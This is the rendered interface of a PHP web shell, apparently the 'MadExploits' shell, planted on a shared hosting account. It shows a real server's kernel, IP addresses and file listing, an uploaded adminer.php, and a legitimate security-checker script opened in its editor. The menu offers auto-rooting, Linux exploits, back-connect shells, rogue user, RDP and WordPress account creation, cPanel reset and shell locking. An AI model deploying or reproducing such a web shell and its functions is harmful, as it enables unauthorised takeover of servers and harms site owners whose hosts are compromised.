Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
alba-demenagements /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
adminer.php
465.43
KB
-rw-r--r--
doctrine
51
B
-rw----r--
doctrine-dbal
66
B
-rw----r--
minifycss
1.25
KB
-rw----r--
minifyjs
1.25
KB
-rw----r--
php-parse
6.1
KB
-rw----r--
security-checker
1.02
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : security-checker
#!/usr/bin/env php <?php /* * This file is part of the SensioLabs Security Checker. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ function includeIfExists($file) { if (file_exists($file)) { return include $file; } } if ((!$loader = includeIfExists(__DIR__.'/vendor/autoload.php')) && (!$loader = includeIfExists(__DIR__.'/../../autoload.php'))) { die('You must set up the project dependencies, run the following commands:'.PHP_EOL. 'curl -sS https://getcomposer.org/installer | php'.PHP_EOL. 'php composer.phar install'.PHP_EOL); } use Symfony\Component\Console\Application; use SensioLabs\Security\Command\SecurityCheckerCommand; use SensioLabs\Security\SecurityChecker; use SensioLabs\Security\Crawler; $console = new Application('SensioLabs Security Checker', SecurityChecker::VERSION); $console->add(new SecurityCheckerCommand(new SecurityChecker(new Crawler()))); $console->run();
Close